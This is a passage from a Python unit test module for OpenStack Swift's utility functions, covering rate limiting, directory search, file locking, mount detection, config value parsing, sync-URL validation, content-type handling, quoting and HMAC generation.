running_time = utils.ratelimit_sleep(running_time, -5) self.verify_under_pseudo_time(testfunc, target_runtime_ms=1) def testfunc(): running_time = 0 for i in range(100): running_time = utils.ratelimit_sleep(running_time, 0) self.verify_under_pseudo_time(testfunc, target_runtime_ms=1) def testfunc(): running_time = 0 for i in range(50): running_time = utils.ratelimit_sleep(running_time, 200) self.verify_under_pseudo_time(testfunc, target_runtime_ms=250) def test_ratelimit_sleep_with_incr(self): def testfunc(): running_time = 0 vals = [5, 17, 0, 3, 11, 30, 40, 4, 13, 2, -1] * 2 # adds up to 248 total = 0 for i in vals: running_time = utils.ratelimit_sleep(running_time, 500, incr_by=i) total += i self.assertEqual(248, total) self.verify_under_pseudo_time(testfunc, target_runtime_ms=500) def test_ratelimit_sleep_with_sleep(self): def testfunc(): running_time = 0 sleeps = [0] * 7 + [.2] * 3 + [0] * 30 for i in sleeps: running_time = utils.ratelimit_sleep(running_time, 40, rate_buffer=1) time.sleep(i) self.verify_under_pseudo_time(testfunc, target_runtime_ms=900) def test_search_tree(self): # file match & ext miss with temptree(['asdf.conf', 'blarg.conf', 'asdf.cfg']) as t: asdf = utils.search_tree(t, 'a*', '.conf') self.assertEqual(len(asdf), 1) self.assertEqual(asdf[0], os.path.join(t, 'asdf.conf')) # multi-file match & glob miss & sort with temptree(['application.bin', 'apple.bin', 'apropos.bin']) as t: app_bins = utils.search_tree(t, 'app*', 'bin') self.assertEqual(len(app_bins), 2) self.assertEqual(app_bins[0], os.path.join(t, 'apple.bin')) self.assertEqual(app_bins[1], os.path.join(t, 'application.bin')) # test file in folder & ext miss & glob miss files = ( 'sub/file1.ini', 'sub/file2.conf', 'sub.bin', 'bus.ini', 'bus/file3.ini', ) with temptree(files) as t: sub_ini = utils.search_tree(t, 'sub*', '.ini') self.assertEqual(len(sub_ini), 1) self.assertEqual(sub_ini[0], os.path.join(t, 'sub/file1.ini')) # test multi-file in folder & sub-folder & ext miss & glob miss files = ( 'folder_file.txt', 'folder/1.txt', 'folder/sub/2.txt', 'folder2/3.txt', 'Folder3/4.txt' 'folder.rc', ) with temptree(files) as t: folder_texts = utils.search_tree(t, 'folder*', '.txt') self.assertEqual(len(folder_texts), 4) f1 = os.path.join(t, 'folder_file.txt') f2 = os.path.join(t, 'folder/1.txt') f3 = os.path.join(t, 'folder/sub/2.txt') f4 = os.path.join(t, 'folder2/3.txt') for f in [f1, f2, f3, f4]: self.assertTrue(f in folder_texts) def test_search_tree_with_directory_ext_match(self): files = ( 'object-server/object-server.conf-base', 'object-server/1.conf.d/base.conf', 'object-server/1.conf.d/1.conf', 'object-server/2.conf.d/base.conf', 'object-server/2.conf.d/2.conf', 'object-server/3.conf.d/base.conf', 'object-server/3.conf.d/3.conf', 'object-server/4.conf.d/base.conf', 'object-server/4.conf.d/4.conf', ) with temptree(files) as t: conf_dirs = utils.search_tree(t, 'object-server', '.conf', dir_ext='conf.d') self.assertEqual(len(conf_dirs), 4) for i in range(4): conf_dir = os.path.join(t, 'object-server/%d.conf.d' % (i + 1)) self.assertTrue(conf_dir in conf_dirs) def test_search_tree_conf_dir_with_named_conf_match(self): files = ( 'proxy-server/proxy-server.conf.d/base.conf', 'proxy-server/proxy-server.conf.d/pipeline.conf', 'proxy-server/proxy-noauth.conf.d/base.conf', 'proxy-server/proxy-noauth.conf.d/pipeline.conf', ) with temptree(files) as t: conf_dirs = utils.search_tree(t, 'proxy-server', 'noauth.conf', dir_ext='noauth.conf.d') self.assertEqual(len(conf_dirs), 1) conf_dir = conf_dirs[0] expected = 
os.path.join(t, 'proxy-server/proxy-noauth.conf.d') self.assertEqual(conf_dir, expected) def test_search_tree_conf_dir_pid_with_named_conf_match(self): files = ( 'proxy-server/proxy-server.pid.d', 'proxy-server/proxy-noauth.pid.d', ) with temptree(files) as t: pid_files = utils.search_tree(t, 'proxy-server', exts=['noauth.pid', 'noauth.pid.d']) self.assertEqual(len(pid_files), 1) pid_file = pid_files[0] expected = os.path.join(t, 'proxy-server/proxy-noauth.pid.d') self.assertEqual(pid_file, expected) def test_write_file(self): with temptree([]) as t: file_name = os.path.join(t, 'test') utils.write_file(file_name, 'test') with open(file_name, 'r') as f: contents = f.read() self.assertEqual(contents, 'test') # and also subdirs file_name = os.path.join(t, 'subdir/test2') utils.write_file(file_name, 'test2') with open(file_name, 'r') as f: contents = f.read() self.assertEqual(contents, 'test2') # but can't over-write files file_name = os.path.join(t, 'subdir/test2/test3') self.assertRaises(IOError, utils.write_file, file_name, 'test3') def test_remove_file(self): with temptree([]) as t: file_name = os.path.join(t, 'blah.pid') # assert no raise self.assertEqual(os.path.exists(file_name), False) self.assertIsNone(utils.remove_file(file_name)) with open(file_name, 'w') as f: f.write('1') self.assertTrue(os.path.exists(file_name)) self.assertIsNone(utils.remove_file(file_name)) self.assertFalse(os.path.exists(file_name)) def test_remove_directory(self): with temptree([]) as t: dir_name = os.path.join(t, 'subdir') os.mkdir(dir_name) self.assertTrue(os.path.isdir(dir_name)) self.assertIsNone(utils.remove_directory(dir_name)) self.assertFalse(os.path.exists(dir_name)) # assert no raise only if it does not exist, or is not empty self.assertEqual(os.path.exists(dir_name), False) self.assertIsNone(utils.remove_directory(dir_name)) _m_rmdir = mock.Mock( side_effect=OSError(errno.ENOTEMPTY, os.strerror(errno.ENOTEMPTY))) with mock.patch('swift.common.utils.os.rmdir', _m_rmdir): self.assertIsNone(utils.remove_directory(dir_name)) _m_rmdir = mock.Mock( side_effect=OSError(errno.EPERM, os.strerror(errno.EPERM))) with mock.patch('swift.common.utils.os.rmdir', _m_rmdir): self.assertRaises(OSError, utils.remove_directory, dir_name) def test_human_readable(self): self.assertEqual(utils.human_readable(0), '0') self.assertEqual(utils.human_readable(1), '1') self.assertEqual(utils.human_readable(10), '10') self.assertEqual(utils.human_readable(100), '100') self.assertEqual(utils.human_readable(999), '999') self.assertEqual(utils.human_readable(1024), '1Ki') self.assertEqual(utils.human_readable(1535), '1Ki') self.assertEqual(utils.human_readable(1536), '2Ki') self.assertEqual(utils.human_readable(1047552), '1023Ki') self.assertEqual(utils.human_readable(1048063), '1023Ki') self.assertEqual(utils.human_readable(1048064), '1Mi') self.assertEqual(utils.human_readable(1048576), '1Mi') self.assertEqual(utils.human_readable(1073741824), '1Gi') self.assertEqual(utils.human_readable(1099511627776), '1Ti') self.assertEqual(utils.human_readable(1125899906842624), '1Pi') self.assertEqual(utils.human_readable(1152921504606846976), '1Ei') self.assertEqual(utils.human_readable(1180591620717411303424), '1Zi') self.assertEqual(utils.human_readable(1208925819614629174706176), '1Yi') self.assertEqual(utils.human_readable(1237940039285380274899124224), '1024Yi') def test_validate_sync_to(self): fname = 'container-sync-realms.conf' fcontents = ''' [US] key = 9ff3b71c849749dbaec4ccdd3cbab62b cluster_dfw1 = http://dfw1.host/v1/ ''' with 
temptree([fname], [fcontents]) as tempdir: logger = FakeLogger() fpath = os.path.join(tempdir, fname) csr = ContainerSyncRealms(fpath, logger) for realms_conf in (None, csr): for goodurl, result in ( ('http://1.1.1.1/v1/a/c', (None, 'http://1.1.1.1/v1/a/c', None, None)), ('http://1.1.1.1:8080/a/c', (None, 'http://1.1.1.1:8080/a/c', None, None)), ('http://2.2.2.2/a/c', (None, 'http://2.2.2.2/a/c', None, None)), ('https://1.1.1.1/v1/a/c', (None, 'https://1.1.1.1/v1/a/c', None, None)), ('//US/DFW1/a/c', (None, 'http://dfw1.host/v1/a/c', 'US', '9ff3b71c849749dbaec4ccdd3cbab62b')), ('//us/DFW1/a/c', (None, 'http://dfw1.host/v1/a/c', 'US', '9ff3b71c849749dbaec4ccdd3cbab62b')), ('//us/dfw1/a/c', (None, 'http://dfw1.host/v1/a/c', 'US', '9ff3b71c849749dbaec4ccdd3cbab62b')), ('//', (None, None, None, None)), ('', (None, None, None, None))): if goodurl.startswith('//') and not realms_conf: self.assertEqual( utils.validate_sync_to( goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf), (None, None, None, None)) else: self.assertEqual( utils.validate_sync_to( goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf), result) for badurl, result in ( ('http://1.1.1.1', ('Path required in X-Container-Sync-To', None, None, None)), ('httpq://1.1.1.1/v1/a/c', ('Invalid scheme \'httpq\' in X-Container-Sync-To, ' 'must be "//", "http", or "https".', None, None, None)), ('http://1.1.1.1/v1/a/c?query', ('Params, queries, and fragments not allowed in ' 'X-Container-Sync-To', None, None, None)), ('http://1.1.1.1/v1/a/c#frag', ('Params, queries, and fragments not allowed in ' 'X-Container-Sync-To', None, None, None)), ('http://1.1.1.1/v1/a/c?query#frag', ('Params, queries, and fragments not allowed in ' 'X-Container-Sync-To', None, None, None)), ('http://1.1.1.1/v1/a/c?query=param', ('Params, queries, and fragments not allowed in ' 'X-Container-Sync-To', None, None, None)), ('http://1.1.1.1/v1/a/c?query=param#frag', ('Params, queries, and fragments not allowed in ' 'X-Container-Sync-To', None, None, None)), ('http://1.1.1.2/v1/a/c', ("Invalid host '1.1.1.2' in X-Container-Sync-To", None, None, None)), ('//us/invalid/a/c', ("No cluster endpoint for 'us' 'invalid'", None, None, None)), ('//invalid/dfw1/a/c', ("No realm key for 'invalid'", None, None, None)), ('//us/invalid1/a/', ("Invalid X-Container-Sync-To format " "'//us/invalid1/a/'", None, None, None)), ('//us/invalid1/a', ("Invalid X-Container-Sync-To format " "'//us/invalid1/a'", None, None, None)), ('//us/invalid1/', ("Invalid X-Container-Sync-To format " "'//us/invalid1/'", None, None, None)), ('//us/invalid1', ("Invalid X-Container-Sync-To format " "'//us/invalid1'", None, None, None)), ('//us/', ("Invalid X-Container-Sync-To format " "'//us/'", None, None, None)), ('//us', ("Invalid X-Container-Sync-To format " "'//us'", None, None, None))): if badurl.startswith('//') and not realms_conf: self.assertEqual( utils.validate_sync_to( badurl, ['1.1.1.1', '2.2.2.2'], realms_conf), (None, None, None, None)) else: self.assertEqual( utils.validate_sync_to( badurl, ['1.1.1.1', '2.2.2.2'], realms_conf), result) def test_TRUE_VALUES(self): for v in utils.TRUE_VALUES: self.assertEqual(v, v.lower()) def test_config_true_value(self): orig_trues = utils.TRUE_VALUES try: utils.TRUE_VALUES = 'hello world'.split() for val in 'hello world HELLO WORLD'.split(): self.assertTrue(utils.config_true_value(val) is True) self.assertTrue(utils.config_true_value(True) is True) self.assertTrue(utils.config_true_value('foo') is False) self.assertTrue(utils.config_true_value(False) is False) finally: 
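            # Restore the module-level constant so the monkey-patched
            # TRUE_VALUES cannot leak into other tests in this module.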
utils.TRUE_VALUES = orig_trues def test_config_positive_int_value(self): expectations = { # value : expected, u'1': 1, b'1': 1, 1: 1, u'2': 2, b'2': 2, u'1024': 1024, b'1024': 1024, u'0': ValueError, b'0': ValueError, u'-1': ValueError, b'-1': ValueError, u'0x01': ValueError, b'0x01': ValueError, u'asdf': ValueError, b'asdf': ValueError, None: ValueError, 0: ValueError, -1: ValueError, u'1.2': ValueError, # string expresses float should be value error b'1.2': ValueError, # string expresses float should be value error } for value, expected in expectations.items(): try: rv = utils.config_positive_int_value(value) except Exception as e: if e.__class__ is not expected: raise else: self.assertEqual( 'Config option must be an positive int number, ' 'not "%s".' % value, e.args[0]) else: self.assertEqual(expected, rv) def test_config_float_value(self): for args, expected in ( ((99, None, None), 99.0), ((99.01, None, None), 99.01), (('99', None, None), 99.0), (('99.01', None, None), 99.01), ((99, 99, None), 99.0), ((99.01, 99.01, None), 99.01), (('99', 99, None), 99.0), (('99.01', 99.01, None), 99.01), ((99, None, 99), 99.0), ((99.01, None, 99.01), 99.01), (('99', None, 99), 99.0), (('99.01', None, 99.01), 99.01), ((-99, -99, -99), -99.0), ((-99.01, -99.01, -99.01), -99.01), (('-99', -99, -99), -99.0), (('-99.01', -99.01, -99.01), -99.01),): actual = utils.config_float_value(*args) self.assertEqual(expected, actual) for val, minimum in ((99, 100), ('99', 100), (-99, -98), ('-98.01', -98)): with self.assertRaises(ValueError) as cm: utils.config_float_value(val, minimum=minimum) self.assertIn('greater than %s' % minimum, cm.exception.args[0]) self.assertNotIn('less than', cm.exception.args[0]) for val, maximum in ((99, 98), ('99', 98), (-99, -100), ('-97.9', -98)): with self.assertRaises(ValueError) as cm: utils.config_float_value(val, maximum=maximum) self.assertIn('less than %s' % maximum, cm.exception.args[0]) self.assertNotIn('greater than', cm.exception.args[0]) for val, minimum, maximum in ((99, 99, 98), ('99', 100, 100), (99, 98, 98),): with self.assertRaises(ValueError) as cm: utils.config_float_value(val, minimum=minimum, maximum=maximum) self.assertIn('greater than %s' % minimum, cm.exception.args[0]) self.assertIn('less than %s' % maximum, cm.exception.args[0]) def test_config_auto_int_value(self): expectations = { # (value, default) : expected, ('1', 0): 1, (1, 0): 1, ('asdf', 0): ValueError, ('auto', 1): 1, ('AutO', 1): 1, ('Aut0', 1): ValueError, (None, 1): 1, } for (value, default), expected in expectations.items(): try: rv = utils.config_auto_int_value(value, default) except Exception as e: if e.__class__ is not expected: raise else: self.assertEqual(expected, rv) def test_streq_const_time(self): self.assertTrue(utils.streq_const_time('abc123', 'abc123')) self.assertFalse(utils.streq_const_time('a', 'aaaaa')) self.assertFalse(utils.streq_const_time('ABC123', 'abc123')) def test_quorum_size(self): expected_sizes = {1: 1, 2: 1, 3: 2, 4: 2, 5: 3} got_sizes = dict([(n, utils.quorum_size(n)) for n in expected_sizes]) self.assertEqual(expected_sizes, got_sizes) def test_majority_size(self): expected_sizes = {1: 1, 2: 2, 3: 2, 4: 3, 5: 3} got_sizes = dict([(n, utils.majority_size(n)) for n in expected_sizes]) self.assertEqual(expected_sizes, got_sizes) def test_rsync_ip_ipv4_localhost(self): self.assertEqual(utils.rsync_ip('127.0.0.1'), '127.0.0.1') def test_rsync_ip_ipv6_random_ip(self): self.assertEqual( utils.rsync_ip('fe80:0000:0000:0000:0202:b3ff:fe1e:8329'), 
'[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]') def test_rsync_ip_ipv6_ipv4_compatible(self): self.assertEqual( utils.rsync_ip('::ffff:192.0.2.128'), '[::ffff:192.0.2.128]') def test_rsync_module_interpolation(self): fake_device = {'ip': '127.0.0.1', 'port': 11, 'replication_ip': '127.0.0.2', 'replication_port': 12, 'region': '1', 'zone': '2', 'device': 'sda1', 'meta': 'just_a_string'} self.assertEqual( utils.rsync_module_interpolation('{ip}', fake_device), '127.0.0.1') self.assertEqual( utils.rsync_module_interpolation('{port}', fake_device), '11') self.assertEqual( utils.rsync_module_interpolation('{replication_ip}', fake_device), '127.0.0.2') self.assertEqual( utils.rsync_module_interpolation('{replication_port}', fake_device), '12') self.assertEqual( utils.rsync_module_interpolation('{region}', fake_device), '1') self.assertEqual( utils.rsync_module_interpolation('{zone}', fake_device), '2') self.assertEqual( utils.rsync_module_interpolation('{device}', fake_device), 'sda1') self.assertEqual( utils.rsync_module_interpolation('{meta}', fake_device), 'just_a_string') self.assertEqual( utils.rsync_module_interpolation('{replication_ip}::object', fake_device), '127.0.0.2::object') self.assertEqual( utils.rsync_module_interpolation('{ip}::container{port}', fake_device), '127.0.0.1::container11') self.assertEqual( utils.rsync_module_interpolation( '{replication_ip}::object_{device}', fake_device), '127.0.0.2::object_sda1') self.assertEqual( utils.rsync_module_interpolation( '127.0.0.3::object_{replication_port}', fake_device), '127.0.0.3::object_12') self.assertRaises(ValueError, utils.rsync_module_interpolation, '{replication_ip}::object_{deivce}', fake_device) def test_generate_trans_id(self): fake_time = 1366428370.5163341 with patch.object(utils.time, 'time', return_value=fake_time): trans_id = utils.generate_trans_id('') self.assertEqual(len(trans_id), 34) self.assertEqual(trans_id[:2], 'tx') self.assertEqual(trans_id[23], '-') self.assertEqual(int(trans_id[24:], 16), int(fake_time)) with patch.object(utils.time, 'time', return_value=fake_time): trans_id = utils.generate_trans_id('-suffix') self.assertEqual(len(trans_id), 41) self.assertEqual(trans_id[:2], 'tx') self.assertEqual(trans_id[34:], '-suffix') self.assertEqual(trans_id[23], '-') self.assertEqual(int(trans_id[24:34], 16), int(fake_time)) def test_get_trans_id_time(self): ts = utils.get_trans_id_time('tx8c8bc884cdaf499bb29429aa9c46946e') self.assertIsNone(ts) ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-0051720c06') self.assertEqual(ts, 1366428678) self.assertEqual( time.asctime(time.gmtime(ts)) + ' UTC', 'Sat Apr 20 03:31:18 2013 UTC') ts = utils.get_trans_id_time( 'tx1df4ff4f55ea45f7b2ec2-0051720c06-suffix') self.assertEqual(ts, 1366428678) self.assertEqual( time.asctime(time.gmtime(ts)) + ' UTC', 'Sat Apr 20 03:31:18 2013 UTC') ts = utils.get_trans_id_time('') self.assertIsNone(ts) ts = utils.get_trans_id_time('garbage') self.assertIsNone(ts) ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-almostright') self.assertIsNone(ts) def test_config_fallocate_value(self): fallocate_value, is_percent = utils.config_fallocate_value('10%') self.assertEqual(fallocate_value, 10) self.assertTrue(is_percent) fallocate_value, is_percent = utils.config_fallocate_value('10') self.assertEqual(fallocate_value, 10) self.assertFalse(is_percent) try: fallocate_value, is_percent = utils.config_fallocate_value('ab%') except ValueError as err: exc = err self.assertEqual(str(exc), 'Error: ab% is an invalid value for ' 'fallocate_reserve.') 
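        # Summary of the formats exercised in this test: plain values must be
        # whole numbers ('10.0' is rejected below), while percentage values
        # ending in '%' may be floats ('10.5%' parses to (10.5, True)).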
try: fallocate_value, is_percent = utils.config_fallocate_value('ab') except ValueError as err: exc = err self.assertEqual(str(exc), 'Error: ab is an invalid value for ' 'fallocate_reserve.') try: fallocate_value, is_percent = utils.config_fallocate_value('1%%') except ValueError as err: exc = err self.assertEqual(str(exc), 'Error: 1%% is an invalid value for ' 'fallocate_reserve.') try: fallocate_value, is_percent = utils.config_fallocate_value('10.0') except ValueError as err: exc = err self.assertEqual(str(exc), 'Error: 10.0 is an invalid value for ' 'fallocate_reserve.') fallocate_value, is_percent = utils.config_fallocate_value('10.5%') self.assertEqual(fallocate_value, 10.5) self.assertTrue(is_percent) fallocate_value, is_percent = utils.config_fallocate_value('10.000%') self.assertEqual(fallocate_value, 10.000) self.assertTrue(is_percent) def test_lock_file(self): flags = os.O_CREAT | os.O_RDWR with NamedTemporaryFile(delete=False) as nt: nt.write(b"test string") nt.flush() nt.close() with utils.lock_file(nt.name, unlink=False) as f: self.assertEqual(f.read(), b"test string") # we have a lock, now let's try to get a newer one fd = os.open(nt.name, flags) self.assertRaises(IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB) with utils.lock_file(nt.name, unlink=False, append=True) as f: f.seek(0) self.assertEqual(f.read(), b"test string") f.seek(0) f.write(b"\nanother string") f.flush() f.seek(0) self.assertEqual(f.read(), b"test string\nanother string") # we have a lock, now let's try to get a newer one fd = os.open(nt.name, flags) self.assertRaises(IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB) with utils.lock_file(nt.name, timeout=3, unlink=False) as f: try: with utils.lock_file( nt.name, timeout=1, unlink=False) as f: self.assertTrue( False, "Expected LockTimeout exception") except LockTimeout: pass with utils.lock_file(nt.name, unlink=True) as f: self.assertEqual(f.read(), b"test string\nanother string") # we have a lock, now let's try to get a newer one fd = os.open(nt.name, flags) self.assertRaises( IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB) self.assertRaises(OSError, os.remove, nt.name) def test_lock_file_unlinked_after_open(self): os_open = os.open first_pass = [True] def deleting_open(filename, flags): # unlink the file after it's opened. once. 
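            # Sketch of the race being simulated (comment only): another
            # process unlinks the lock file between our open() and flock().
            # lock_file() is expected to notice that the path no longer refers
            # to the inode it opened and retry with a fresh open, which is
            # what the st_ino comparison below verifies.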
fd = os_open(filename, flags) if first_pass[0]: os.unlink(filename) first_pass[0] = False return fd with NamedTemporaryFile(delete=False) as nt: with mock.patch('os.open', deleting_open): with utils.lock_file(nt.name, unlink=True) as f: self.assertNotEqual(os.fstat(nt.fileno()).st_ino, os.fstat(f.fileno()).st_ino) first_pass = [True] def recreating_open(filename, flags): # unlink and recreate the file after it's opened fd = os_open(filename, flags) if first_pass[0]: os.unlink(filename) os.close(os_open(filename, os.O_CREAT | os.O_RDWR)) first_pass[0] = False return fd with NamedTemporaryFile(delete=False) as nt: with mock.patch('os.open', recreating_open): with utils.lock_file(nt.name, unlink=True) as f: self.assertNotEqual(os.fstat(nt.fileno()).st_ino, os.fstat(f.fileno()).st_ino) def test_lock_file_held_on_unlink(self): os_unlink = os.unlink def flocking_unlink(filename): # make sure the lock is held when we unlink fd = os.open(filename, os.O_RDWR) self.assertRaises( IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB) os.close(fd) os_unlink(filename) with NamedTemporaryFile(delete=False) as nt: with mock.patch('os.unlink', flocking_unlink): with utils.lock_file(nt.name, unlink=True): pass def test_lock_file_no_unlink_if_fail(self): os_open = os.open with NamedTemporaryFile(delete=True) as nt: def lock_on_open(filename, flags): # lock the file on another fd after it's opened. fd = os_open(filename, flags) fd2 = os_open(filename, flags) fcntl.flock(fd2, fcntl.LOCK_EX | fcntl.LOCK_NB) return fd try: timedout = False with mock.patch('os.open', lock_on_open): with utils.lock_file(nt.name, unlink=False, timeout=0.01): pass except LockTimeout: timedout = True self.assertTrue(timedout) self.assertTrue(os.path.exists(nt.name)) def test_ismount_path_does_not_exist(self): tmpdir = mkdtemp() try: self.assertFalse(utils.ismount(os.path.join(tmpdir, 'bar'))) finally: shutil.rmtree(tmpdir) def test_ismount_path_not_mount(self): tmpdir = mkdtemp() try: self.assertFalse(utils.ismount(tmpdir)) finally: shutil.rmtree(tmpdir) def test_ismount_path_error(self): def _mock_os_lstat(path): raise OSError(13, "foo") tmpdir = mkdtemp() try: with patch("os.lstat", _mock_os_lstat): # Raises exception with _raw -- see next test. utils.ismount(tmpdir) finally: shutil.rmtree(tmpdir) def test_ismount_raw_path_error(self): def _mock_os_lstat(path): raise OSError(13, "foo") tmpdir = mkdtemp() try: with patch("os.lstat", _mock_os_lstat): self.assertRaises(OSError, utils.ismount_raw, tmpdir) finally: shutil.rmtree(tmpdir) def test_ismount_path_is_symlink(self): tmpdir = mkdtemp() try: link = os.path.join(tmpdir, "tmp") rdir = os.path.join(tmpdir, "realtmp") os.mkdir(rdir) os.symlink(rdir, link) self.assertFalse(utils.ismount(link)) # Can add a stubfile to make it pass with open(os.path.join(link, ".ismount"), "w"): pass self.assertTrue(utils.ismount(link)) finally: shutil.rmtree(tmpdir) def test_ismount_path_is_root(self): self.assertTrue(utils.ismount('/')) def test_ismount_parent_path_error(self): _os_lstat = os.lstat def _mock_os_lstat(path): if path.endswith(".."): raise OSError(13, "foo") else: return _os_lstat(path) tmpdir = mkdtemp() try: with patch("os.lstat", _mock_os_lstat): # Raises exception with _raw -- see next test. 
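                # Unlike ismount_raw(), ismount() is expected to swallow the
                # OSError raised for the parent path; this call only checks
                # that no exception propagates -- the return value is not
                # asserted.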
utils.ismount(tmpdir) finally: shutil.rmtree(tmpdir) def test_ismount_raw_parent_path_error(self): _os_lstat = os.lstat def _mock_os_lstat(path): if path.endswith(".."): raise OSError(13, "foo") else: return _os_lstat(path) tmpdir = mkdtemp() try: with patch("os.lstat", _mock_os_lstat): self.assertRaises(OSError, utils.ismount_raw, tmpdir) finally: shutil.rmtree(tmpdir) def test_ismount_successes_dev(self): _os_lstat = os.lstat class MockStat(object): def __init__(self, mode, dev, ino): self.st_mode = mode self.st_dev = dev self.st_ino = ino def _mock_os_lstat(path): if path.endswith(".."): parent = _os_lstat(path) return MockStat(parent.st_mode, parent.st_dev + 1, parent.st_ino) else: return _os_lstat(path) tmpdir = mkdtemp() try: with patch("os.lstat", _mock_os_lstat): self.assertTrue(utils.ismount(tmpdir)) finally: shutil.rmtree(tmpdir) def test_ismount_successes_ino(self): _os_lstat = os.lstat class MockStat(object): def __init__(self, mode, dev, ino): self.st_mode = mode self.st_dev = dev self.st_ino = ino def _mock_os_lstat(path): if path.endswith(".."): return _os_lstat(path) else: parent_path = os.path.join(path, "..") child = _os_lstat(path) parent = _os_lstat(parent_path) return MockStat(child.st_mode, parent.st_ino, child.st_dev) tmpdir = mkdtemp() try: with patch("os.lstat", _mock_os_lstat): self.assertTrue(utils.ismount(tmpdir)) finally: shutil.rmtree(tmpdir) def test_ismount_successes_stubfile(self): tmpdir = mkdtemp() fname = os.path.join(tmpdir, ".ismount") try: with open(fname, "w") as stubfile: stubfile.write("") self.assertTrue(utils.ismount(tmpdir)) finally: shutil.rmtree(tmpdir) def test_parse_content_type(self): self.assertEqual(utils.parse_content_type('text/plain'), ('text/plain', [])) self.assertEqual(utils.parse_content_type('text/plain;charset=utf-8'), ('text/plain', [('charset', 'utf-8')])) self.assertEqual( utils.parse_content_type('text/plain;hello="world";charset=utf-8'), ('text/plain', [('hello', '"world"'), ('charset', 'utf-8')])) self.assertEqual( utils.parse_content_type('text/plain; hello="world"; a=b'), ('text/plain', [('hello', '"world"'), ('a', 'b')])) self.assertEqual( utils.parse_content_type(r'text/plain; x="\""; a=b'), ('text/plain', [('x', r'"\""'), ('a', 'b')])) self.assertEqual( utils.parse_content_type(r'text/plain; x; a=b'), ('text/plain', [('x', ''), ('a', 'b')])) self.assertEqual( utils.parse_content_type(r'text/plain; x="\""; a'), ('text/plain', [('x', r'"\""'), ('a', '')])) def test_override_bytes_from_content_type(self): listing_dict = { 'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv', 'content_type': 'text/plain; hello="world"; swift_bytes=15'} utils.override_bytes_from_content_type(listing_dict, logger=FakeLogger()) self.assertEqual(listing_dict['bytes'], 15) self.assertEqual(listing_dict['content_type'], 'text/plain;hello="world"') listing_dict = { 'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv', 'content_type': 'text/plain; hello="world"; swift_bytes=hey'} utils.override_bytes_from_content_type(listing_dict, logger=FakeLogger()) self.assertEqual(listing_dict['bytes'], 1234) self.assertEqual(listing_dict['content_type'], 'text/plain;hello="world"') def test_extract_swift_bytes(self): scenarios = { # maps input value -> expected returned tuple '': ('', None), 'text/plain': ('text/plain', None), 'text/plain; other=thing': ('text/plain;other=thing', None), 'text/plain; swift_bytes=123': ('text/plain', '123'), 'text/plain; other=thing;swift_bytes=123': ('text/plain;other=thing', '123'), 'text/plain; swift_bytes=123; other=thing': 
('text/plain;other=thing', '123'), 'text/plain; swift_bytes=123; swift_bytes=456': ('text/plain', '456'), 'text/plain; swift_bytes=123; other=thing;swift_bytes=456': ('text/plain;other=thing', '456')} for test_value, expected in scenarios.items(): self.assertEqual(expected, utils.extract_swift_bytes(test_value)) def test_clean_content_type(self): subtests = { '': '', 'text/plain': 'text/plain', 'text/plain; someother=thing': 'text/plain; someother=thing', 'text/plain; swift_bytes=123': 'text/plain', 'text/plain; someother=thing; swift_bytes=123': 'text/plain; someother=thing', # Since Swift always tacks on the swift_bytes, clean_content_type() # only strips swift_bytes if it's last. The next item simply shows # that if for some other odd reason it's not last, # clean_content_type() will not remove it from the header. 'text/plain; swift_bytes=123; someother=thing': 'text/plain; swift_bytes=123; someother=thing'} for before, after in subtests.items(): self.assertEqual(utils.clean_content_type(before), after) def test_get_valid_utf8_str(self): def do_test(input_value, expected): actual = utils.get_valid_utf8_str(input_value) self.assertEqual(expected, actual) self.assertIsInstance(actual, six.binary_type) actual.decode('utf-8') do_test(b'abc', b'abc') do_test(u'abc', b'abc') do_test(u'\uc77c\uc601', b'\xec\x9d\xbc\xec\x98\x81') do_test(b'\xec\x9d\xbc\xec\x98\x81', b'\xec\x9d\xbc\xec\x98\x81') # test some invalid UTF-8 do_test(b'\xec\x9d\xbc\xec\x98', b'\xec\x9d\xbc\xef\xbf\xbd') # check surrogate pairs, too do_test(u'\U0001f0a1', b'\xf0\x9f\x82\xa1'), do_test(u'\uD83C\uDCA1', b'\xf0\x9f\x82\xa1'), do_test(b'\xf0\x9f\x82\xa1', b'\xf0\x9f\x82\xa1'), do_test(b'\xed\xa0\xbc\xed\xb2\xa1', b'\xf0\x9f\x82\xa1'), def test_quote_bytes(self): self.assertEqual(b'/v1/a/c3/subdirx/', utils.quote(b'/v1/a/c3/subdirx/')) self.assertEqual(b'/v1/a%26b/c3/subdirx/', utils.quote(b'/v1/a&b/c3/subdirx/')) self.assertEqual(b'%2Fv1%2Fa&b%2Fc3%2Fsubdirx%2F', utils.quote(b'/v1/a&b/c3/subdirx/', safe='&')) self.assertEqual(b'abc_%EC%9D%BC%EC%98%81', utils.quote(u'abc_\uc77c\uc601'.encode('utf8'))) # Invalid utf8 is parsed as latin1, then re-encoded as utf8?? self.assertEqual(b'%EF%BF%BD%EF%BF%BD%EC%BC%9D%EF%BF%BD', utils.quote(u'\uc77c\uc601'.encode('utf8')[::-1])) def test_quote_unicode(self): self.assertEqual(u'/v1/a/c3/subdirx/', utils.quote(u'/v1/a/c3/subdirx/')) self.assertEqual(u'/v1/a%26b/c3/subdirx/', utils.quote(u'/v1/a&b/c3/subdirx/')) self.assertEqual(u'%2Fv1%2Fa&b%2Fc3%2Fsubdirx%2F', utils.quote(u'/v1/a&b/c3/subdirx/', safe='&')) self.assertEqual(u'abc_%EC%9D%BC%EC%98%81', utils.quote(u'abc_\uc77c\uc601')) def test_get_hmac(self): self.assertEqual( utils.get_hmac('GET', '/path', 1, 'abc'), 'b17f6ff8da0e251737aa9e3ee69a881e3e092e2f') def test_get_hmac_ip_range(self): self.assertEqual( utils.get_hmac('GET', '/path', 1, 'abc', ip_range='127.0.0.1'), 'b30dde4d2b8562b8496466c3b46b2b9ac5054461') def test_get_hmac_ip_range_non_binary_type(self): self.assertEqual( utils.get_hmac(u'GET', u'/path', 1, u'abc', ip_range=u'127.0.0.1'), 